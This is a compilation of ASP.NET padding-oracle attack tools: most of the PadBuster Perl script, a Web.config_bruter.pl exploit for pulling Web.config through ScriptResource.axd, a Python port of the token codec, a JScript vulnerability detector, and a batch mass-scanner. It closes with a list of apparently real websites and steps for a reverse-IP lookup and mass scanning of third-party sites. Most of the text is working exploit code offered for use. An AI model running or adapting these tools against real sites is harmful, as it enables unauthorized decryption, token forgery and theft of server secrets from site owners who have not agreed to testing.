my $plainTextBytes;

# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;

# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;

# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);

# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;

# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);

if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
print "\nERROR: There is only one block. Try again using the -noiv option.\n";
exit();
}

# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time


# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);

&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);

$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;

if ($bruteForce) {
&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
my $bfAttempts = 0;

print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;

# Only loop through the first 3 bytes...this should be enough as it
# requires 16.5M+ requests

my @bfSamples;
my $sampleString = "\x00" x 2;
for my $c (0 ... 255) {
substr($sampleString, 0, 1, chr($c));
for my $d (0 ... 255) {
substr($sampleString, 1, 1, chr($d));
push (@bfSamples, $sampleString);
}
}

foreach my $testVal (@bfSamples) {
my $complete = 0;
while ($complete == 0) {
my $repeat = 0;
for my $b (0 ... 255) {
$bfAttempts++;
if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
#SKIP
} else {

my $testBytes = chr($b).$testVal;
$testBytes .= "\x00" x ($blockSize-3);

my $combinedBf = $testBytes;
$combinedBf .= $encryptedBytes;
$combinedBf = &myEncode($combinedBf, $encoding);

# Add the Query String to the URL
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);


# Issue the request
my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

if ($oracleSignature eq "") {
&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
$oracleGuesses{$signatureData}++;
$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
if ($b == 255) {
&myPrint("*** Response Analysis Complete ***\n",0);
&determineSignature();

$printStats = 1;
$timeTracker = 0;
$requestTracker = 0;
$repeat = 1;
$bfAttempts = 0;
}
}
if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
}
} elsif ($plainTextInput) {
# ENCRYPT MODE
&myPrint("INFO: Starting PadBuster Encrypt Mode",0);

# The block count will be the plaintext divided by blocksize (rounded up)
my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);

my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
$plainTextInput.= chr($padCount) x $padCount;

# SampleBytes is the encrypted text you want to derive intermediate values for, so
# copy the current ciphertext block into sampleBytes
# Note, nulls are used if not provided and the intermediate values are brute forced

$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
my $sampleBytes = $forgedBytes;

for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
my $intermediaryBytes;

if ($intermediaryInput && $blockNum == $blockCount) {
$intermediaryBytes = &myDecode($intermediaryInput,2);
} else {
$intermediaryBytes = &processBlock($sampleBytes);
}

# Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
# This will become the next ciphertext block (or IV if the last one)
$sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
$forgedBytes = $sampleBytes.$forgedBytes;

&myPrint("\nBlock ".($blockNum)." Results:",0);
&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);

}
$forgedBytes = &myEncode($forgedBytes, $encoding);
chomp($forgedBytes);
} else {
# DECRYPT MODE
&myPrint("INFO: Starting PadBuster Decrypt Mode",0);

if ($resumeBlock) {
&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
} else {
$resumeBlock = 1
}

# Assume that the IV is included in our sample and that the first block is the IV
for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) {
# Since the IV is the first block, our block count is artificially inflated by one
&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);

# SampleBytes is the encrypted text you want to break, so

# lets copy the current ciphertext block into sampleBytes
my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);

# IntermediaryBytes is where the intermediary bytes produced by the algorithm are stored
my $intermediaryBytes = &processBlock($sampleBytes);

# DecryptedBytes is where the decrypted block is stored
my $decryptedBytes;

# Now we XOR the decrypted byte with the corresponding byte from the previous block
# (or IV if we are in the first block) to get the actual plain-text
$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes :
$decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize);

&myPrint("\nBlock ".($blockNum-1)." Results:",0);
&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
&myPrint("[+] Plain Text: $decryptedBytes\n",0);
$plainTextBytes = $plainTextBytes.$decryptedBytes;
}
}

&myPrint("-------------------------------------------------------",0);

&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {
&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);

sub determineSignature {
# Help the user detect the oracle response if an error string was not provided
# This logic will automatically suggest the response pattern that occurred most often
# during the test as this is the most likely one

my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses;

&myPrint("The following response signatures were returned:\n",0);
&myPrint("-------------------------------------------------------",0);
if ($useBody) {
&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
} else {
&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
}
&myPrint("-------------------------------------------------------",0);

my $id = 1;

foreach (@sortedGuesses) {
my $line = $id;
($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
my @sigFields = split("\t", $_);
$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
$line .= "\t$sigFields[2]";
&myPrint($line,0);
&writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
$id++;
}
&myPrint("-------------------------------------------------------",0);

if ($#sortedGuesses == 0 && !$bruteForce) {
&myPrint("\nERROR: All of the responses were identical.\n",0);
&myPrint("Double check the Block Size and try again.",0);
exit();
} else {
my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
&myPrint("\nContinuing test with selection $responseNum\n",0);
$oracleSignature = $sortedGuesses[$responseNum-1];
}

}

sub prepRequest {
my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;

# Prepare the request
my $testUrl = $pUrl;
my $wasSampleFound = 0;

if ($pUrl =~ /$pSample/) {
$testUrl =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}

my $testPost = "";
if ($pPost) {
$testPost = $pPost;
if ($pPost =~ /$pSample/) {
$testPost =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}

my $testCookies = "";
if ($pCookie) {
$testCookies = $pCookie;

if ($pCookie =~ /$pSample/) {
$testCookies =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}

if ($wasSampleFound == 0) {
&myPrint("ERROR: Encrypted sample was not found in the test request",0);
exit();
}
return ($testUrl, $testPost, $testCookies);
}

sub processBlock {
my ($sampleBytes) = @_;
my $analysisMode;
# Analysis mode is either 0 (response analysis) or 1 (exploit)
$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;

# The return value of this subroutine is the intermediate text for the block
my $returnValue;

my $complete = 0;
my $autoRetry = 0;
my $hasHit = 0;

while ($complete == 0) {
# Reset the return value
$returnValue = "";

my $repeat = 0;

# TestBytes are the fake bytes that are prepended to the cipher text for the padding attack
my $testBytes = "\x00" x $blockSize;

my $falsePositiveDetector = 0;

# Work on one byte at a time, starting with the last byte and moving backwards
OUTERLOOP:
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
INNERLOOP:
for (my $i = 255; $i >= 0; $i--) {
# Fuzz the test byte
substr($testBytes, $byteNum, 1, chr($i));

# Combine the test bytes and the sample
my $combinedTestBytes = $testBytes.$sampleBytes;

if ($prefix) {
$combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes;
}

$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
chomp($combinedTestBytes);

if (! $noEncodeOption) {
$combinedTestBytes = &uri_escape($combinedTestBytes);
}

my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);

# Ok, now make the request

my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

# If this is the first block and there is no padding error message defined, then cycle through
# all possible requests and let the user decide what the padding error behavior is.
if ($analysisMode == 0) {
&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);

$oracleGuesses{$signatureData}++;

$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";

if ($byteNum == $blockSize - 1 && $i == 0) {
&myPrint("*** Response Analysis Complete ***\n",0);
&determineSignature();
$analysisMode = 1;
$repeat = 1;
last OUTERLOOP;
}
}

my $continue = "y";

if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
# This is for autoretry logic (only works on the first byte)
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
$hasHit++;
} else {
# If there was no padding error, then it worked
&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);

&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);

# If continually getting a hit on attempt zero, then something is probably wrong
$falsePositiveDetector++ if ($i == 255);

if ($interactive == 1) {
$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
}

if ($continue eq "y" || $continue eq "a") {
$interactive = 0 if ($continue eq "a");

# Next, calculate the decrypted byte by XORing it with the padding value
my ($currentPaddingByte, $nextPaddingByte);

# These variables could allow for flexible padding schemes (for now PKCS)
# For PKCS#7, the padding block is equal to chr($blockSize - $byteNum)
$currentPaddingByte = chr($blockSize - $byteNum);
$nextPaddingByte = chr($blockSize - $byteNum + 1);

my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);

$returnValue = $decryptedByte.$returnValue;
&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);

# Finally, update the test bytes in preparation for the next round, based on the padding used
for (my $k = $byteNum; $k < $blockSize; $k++) {
# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));

# Then, XOR it again with the padding byte for the next round
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
}
last INNERLOOP;
}

}
}

## TODO: Combine these two blocks?
if ($i == 0 && $analysisMode == 1) {
# End of the road with no success. We should probably try again.
&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);

if ($autoRetry == 0) {
$autoRetry = 1;
&myPrint(" Automatically trying one more time...",0);
$repeat = 1;
last OUTERLOOP;

} else {
if (($byteNum == $blockSize - 1) && ($error)) {
&myPrint("\nAre you sure you specified the correct error string?",0);
&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
}

$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
if ($continue ne "n") {
&myPrint("INFO: Switching to interactive mode",0);
$interactive = 1;
$repeat = 1;

last OUTERLOOP;
}
}
}
if ($falsePositiveDetector == $blockSize) {
&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
if ($error) {
&myPrint("[+] Check the error string you provided and try again, or consider running",0);
&myPrint("[+] without an error string to perform an automated response analysis.\n",0);
} else {
&myPrint("[+] You may want to consider defining a custom padding error string",0);
&myPrint("[+] instead of the automated response analysis.\n",0);
}
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
if ($continue eq "y") {
&myPrint("INFO: Switching to interactive mode",0);
$interactive = 1;
$repeat = 1;
last OUTERLOOP;
}

}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
return $returnValue;
}

sub makeRequest {

my ($method, $url, $data, $cookie) = @_;
my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
my $numRetries = 0;
$data ='' unless $data;
$cookie='' unless $cookie;

$requestTracker++;
do {
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
$ENV{HTTPS_PROXY} = "";

$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],

);

$req = new HTTP::Request $method => $url;

&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;

# Add request content for POST and PUTS
if ($data) {
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
}

if ($proxy) {
my $proxyUrl = "http://";
if ($proxyAuth) {
my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
$ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
$ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
$proxyUrl .= $proxyAuth."@";
}
$proxyUrl .= $proxy;
$lwp->proxy(['http'], "http://".$proxy);
$ENV{HTTPS_PROXY} = "http://".$proxy;
}

if ($auth) {
my ($httpuser, $httppass) = split(/:/,$auth);
$req->authorization_basic($httpuser, $httppass);
}

# If cookies are defined, add a COOKIE header
if (! $cookie eq "") {
$req->header(Cookie => $cookie);
}

if ($headers) {
my @customHeaders = split(/;/i,$headers);
for (my $i = 0; $i <= $#customHeaders; $i++) {
my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
$req->header($headerName, $headerVal);
}
}

my $startTime = &gettimeofday();
my $response = $lwp->request($req);
my $endTime = &gettimeofday();
$timeTracker = $timeTracker + ($endTime - $startTime);

if ($printStats == 1 && $requestTracker % 250 == 0) {
# $timeTracker holds the total time of the last 250 requests, so average over 250
print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/250).")\n";
$timeTracker = 0;
}
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;

&myPrint("Response Content:\n$content",0) if $superVerbose;
$location = $response->header("Location");
if (!$location) {
$location = "N/A";
}
#$contentLength = $response->header("Content-Length");
$contentLength = length($content);


my $contentEncoding = $response->header("Content-Encoding");
if ($contentEncoding) {
if ($contentEncoding =~ /GZIP/i ) {
$content = Compress::Zlib::memGunzip($content);
$contentLength = length($content);
}
}

my $statusMsg = $response->status_line;
#myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);

if ($statusMsg =~ /Can't connect/) {
print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
$noConnect = 1;
$numRetries++;
sleep 10;
} else {
$noConnect = 0;
$totalRequests++;
}
} until (($noConnect == 0) || ($numRetries >= 15));
if ($numRetries >= 15) {
&myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
exit;
}
return ($status, $content, $location, $contentLength);
}

sub myPrint {
my ($printData, $printLevel) = @_;
$printData .= "\n";
if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
print $printData;
&writeFile("ActivityLog.txt",$printData);
}
}

sub myEncode {
my ($toEncode, $format) = @_;
return &encodeDecode($toEncode, 0, $format);
}

sub myDecode {
my ($toDecode, $format) = @_;
return &encodeDecode($toDecode, 1, $format);
}

sub encodeDecode {
my ($toEncodeDecode, $oper, $format) = @_;
# Oper: 0=Encode, 1=Decode
# Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
my $returnVal = "";
if ($format == 1 || $format == 2) {
# HEX
if ($oper == 1) {
#Decode
#Always convert to lower when decoding)
$toEncodeDecode = lc($toEncodeDecode);
$returnVal = pack("H*",$toEncodeDecode);
} else {
#Encode
$returnVal = unpack("H*",$toEncodeDecode);
if ($format == 2) {

#Uppercase
$returnVal = uc($returnVal)
}
}
} elsif ($format == 3) {
# NetUrlToken
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,1);
} else {
$returnVal = &web64Encode($toEncodeDecode,1);
}
} elsif ($format == 4) {
# Web64
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,0);
} else {
$returnVal = &web64Encode($toEncodeDecode,0);
}
} else {
# B64
if ($oper == 1) {
$returnVal = &decode_base64($toEncodeDecode);
} else {
$returnVal = &encode_base64($toEncodeDecode);
$returnVal =~ s/(\r|\n)//g;
}

}

return $returnVal;
}


sub web64Encode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input = &encode_base64($input);
$input =~ s/(\r|\n)//g;
$input =~ s/\+/\-/g;
$input =~ s/\//\_/g;
my $count = $input =~ s/\=//g;
$count = 0 if ($count eq "");
$input.=$count if ($net == 1);
return $input;
}

sub web64Decode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input =~ s/\-/\+/g;
$input =~ s/\_/\//g;
if ($net == 1) {
my $count = chop($input);

$input = $input.("=" x int($count));
}
return &decode_base64($input);
}


sub promptUser {
my($prompt, $default, $yn) = @_;
my $defaultValue = $default ? "[$default]" : "";
print "$prompt $defaultValue: ";
chomp(my $input = <STDIN>);

$input = $input ? $input : $default;
if ($yn) {
# Yes/No/All prompt: accept exactly one of y, n or a and re-prompt otherwise
if ($input =~ /^(y|n|a)$/) {
return $input;
} else {
return &promptUser($prompt, $default, $yn);
}
} else {
# Numeric prompt: accept a number from 1 to 255 and re-prompt otherwise
if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
return $input;
} else {
return &promptUser($prompt, $default);
}
}
}

sub writeFile {
my ($fileName, $fileContent) = @_;
if ($logFiles) {
if ($dirExists != 1) {
system($dirCmd." ".$dirName);
$dirExists = 1;
}
$fileName = $dirName.$dirSlash.$fileName;
open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
print $OUTFILE $fileContent;
close($OUTFILE);
}
}

sub getTime {
my ($format) = @_;
my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) =
localtime(time);
my @months =
("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
$month=sprintf("%02d",$month);
$day=sprintf("%02d",$day);
$hour=sprintf("%02d",$hour);
$minute=sprintf("%02d",$minute);

$second=sprintf("%02d", $second);
$year =~ s/^.//;
if ($format eq "F") {
return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
} elsif ($format eq "S") {
return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
} else {
return $hour.":".$minute.":".$second;
}
}
Web.config_bruter.pl

#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# To use this script you need PadBuster.
# PadBuster is a great tool and Brian Holyfield deserves all the credit.
#
#
# Giorgio Fedon - ([email protected])
#

use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;

#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;

my $testUrl;
my $testBytes;
my $sampleBytes;

my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];

if ($#ARGV < 2) {
die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize

Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This needs to come from PadBuster.
BlockSize = The block size being used by the algorithm (8 or 16)

Poc code by giorgio.fedon\@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science


Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd
d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16


";}


my $method = "GET";

$sampleBytes = encoder($sampleBytes, 1);

my $testBytes = "\x00" x $blockSize;
my $counter = 0;

# Use random bytes
my @nums = (0..255);
my $status = 1;

while ($status)
{
# Fuzz the test bytes

for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
{
substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
}

# Combine the test bytes and the sample
my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
chomp($combinedTestBytes);
$combinedTestBytes =~ s/\%0A//g;

# Ok, now make the request
my ($status, $content, $location, $contentLength) =
makeRequest($method, $testUrl.$combinedTestBytes);

if ($status == "200")
{

# Remove this for "T" exploit
if (index($content,"parent\.Sys\.Application") == -1)
{
print $content."\n\n";
print "Total Requests:".$counter."\n\n";
print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
last;
}
}

$counter++;

}

# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better

sub encoder
{

my ($toEncodeDecode, $oper) = @_;

# UrlDecoder Encoder

if ($oper == 1)
{
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
}

else

{
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
}

return $returnVal;
}

sub makeRequest {
my ($method, $url) = @_;
my ($lwp, $status, $content, $req, $location, $contentLength);

# Setup LWP UserAgent
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);

$req = new HTTP::Request $method => $url;


my $response = $lwp->request($req);

# Extract the required attributes from the response

$status = substr($response->status_line, 0, 3);

$content = $response->content;
#print $content;
$location = $response->header("Location");

if ($location eq "")
{
$location = "N/A";
}

$contentLength = $response->header("Content-Length");
return ($status, $content, $location, $contentLength);
}
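Both the PadBuster encodeDecode/web64Encode/web64Decode subs above and the encoder sub in Web.config_bruter.pl implement the same token format (PadBuster's -encoding 3, "NetUrlToken"): Base64 with + and / swapped for - and _, the = padding removed, and the number of removed = characters appended as a trailing digit. The Python port below is an added example, not code from either script, written so that a reviewer can decode a captured d= value offline and confirm its block structure; all function names are mine. Unlike Perl's decode_base64, Python's base64 module rejects unpadded input, so the decoder recomputes the padding for the count-less Web64 variant (PadBuster's -encoding 4).

```python
import base64


def web64_encode(data: bytes, net: bool = True) -> str:
    """Encode bytes as Web64 (net=False) or NetUrlToken (net=True).

    NetUrlToken is the ASP.NET form: URL-safe alphabet, '=' padding removed,
    and the number of removed '=' characters appended as a single digit.
    """
    b64 = base64.b64encode(data).decode("ascii")
    pad_count = b64.count("=")
    token = b64.rstrip("=").replace("+", "-").replace("/", "_")
    return token + str(pad_count) if net else token


def web64_decode(token: str, net: bool = True) -> bytes:
    """Inverse of web64_encode; raises ValueError on malformed input."""
    if net:
        if not token or token[-1] not in "012":
            raise ValueError("NetUrlToken must end with a padding digit 0-2")
        pad_count, token = int(token[-1]), token[:-1]
    else:
        # Web64 carries no count, so restore the padding from the length.
        pad_count = (-len(token)) % 4
    if pad_count == 3:  # never valid: Base64 uses at most two '=' characters
        raise ValueError("invalid Web64 length")
    padded = token.replace("-", "+").replace("_", "/") + "=" * pad_count
    return base64.b64decode(padded, validate=True)


def token_blocks(token: str, block_size: int = 16, net: bool = True) -> list:
    """Split a decoded token into cipher blocks, as PadBuster treats it.

    A token whose decoded length is not a multiple of the block size cannot be
    CBC ciphertext for that block size, so it is reported rather than guessed.
    """
    raw = web64_decode(token, net)
    if len(raw) % block_size:
        raise ValueError(f"{len(raw)} bytes is not a multiple of {block_size}")
    return [raw[i:i + block_size] for i in range(0, len(raw), block_size)]


if __name__ == "__main__":
    # The all-NULL dummy sample quoted in the PadBuster write-up later on this page
    print(web64_encode(b"\x00" * 16))
    # The 16-byte sample value used in the write-up's command examples
    print(token_blocks("1s45vAJre3GVd98iQoAjgQ2"))
```

Encoding sixteen zero bytes reproduces the AAAAAAAAAAAAAAAAAAAAAA2 dummy value used in the write-up below (22 characters of Base64 plus a count of 2), which is a quick sanity check that a decoder is handling the trailing digit correctly.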

AspNetPaddingOracleDetector.js [ JavaScript ]

/*
----------------------------------------
AspNetPaddingOracleDetector for ASP.NET
----------------------------------------
Duncan Smart, http://blog.dotsmart.net/
*/

if (!WScript.FullName.match(/\\cscript\.exe$/i))
{
// Re-run in command prompt
new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "'+
WScript.ScriptFullName +'" & pause')
WScript.Quit(0);
}

var siteRoot;
if (WScript.Arguments.Unnamed.Count != 1) {
WScript.Echo("Enter site URL: ")
siteRoot = WScript.StdIn.ReadLine()
}
else {
siteRoot = WScript.Arguments.Unnamed.Item(0);
}

// Append root slash if necessary
if (!siteRoot.match("/$"))
siteRoot += "/";

WScript.Echo("Testing site: " + siteRoot);

//TODO: add more tests for other padding oracles
var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar");
var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar");

// Compare HTTP statuses
if (response1.status != response2.status)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.status);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.status);
WScript.Quit(1);
}

// Compare headers
if (response1.headers != response2.headers)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.headers);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.headers);
WScript.Quit(1);
}

// Compare HTML
if (response1.body != response2.body)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch");
WScript.Echo("=== Response 1 ===");
WScript.Echo(response1.body);
WScript.Echo("");
WScript.Echo("=== Response 2 ===");
WScript.Echo(response2.body);
WScript.Quit(1);
}

WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle");
WScript.Quit(0);

// ====== Utilities ======
function httpGet(url)
{
var http = new ActiveXObject("Microsoft.XMLHTTP");
http.open("GET", url, /*async*/ false);
try {
http.send();
}
catch (err) {
return {'status':null, 'headers':null, 'body':null};
}

var headers = http.getAllResponseHeaders().split(/\r\n/);
// Remove "Date" header as that will likely be different!
headers = filter(headers, function(h){ return !h.match("^Date:") });

return {
status: http.status + " " + http.statusText,
headers: headers.join("\r\n"),
body: http.responseText
};
}

// Filters array to items that satisfy 'where' function
function filter(array, where){
var newArray = [];
for (var i = 0; i < array.length; i++) {
if (where(array[i]))
newArray.push(array[i]);
}
return newArray;
}

ListSite.txt [ A blank file in which you write the website names ]

Eg. http://moitruongsuckhoe.vn
http://simpleway.vn
http://sieuthi.xuctienthuongmai.vn
http://footballonline.vn
http://hdradio.vn
http://domucgiare.com
CheckPaddingOracle.bat [ A batch program for checking for the padding oracle vulnerability ]

@echo off
setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (ListSite.txt) do (
cscript //nologo AspNetPaddingOracleDetector.js %%a
echo.
)
cmd

How To:

- Go to any ASP.NET-related website. Do a reverse IP domain check and find the server and
other sites.

- Copy all sites to Notepad and name the file ListSite.txt

- Run CheckPaddingOracle.bat; the script checks each website in the list for the vulnerability.

- Open a vulnerable site and check its source code for:
/WebResource.axd?d=
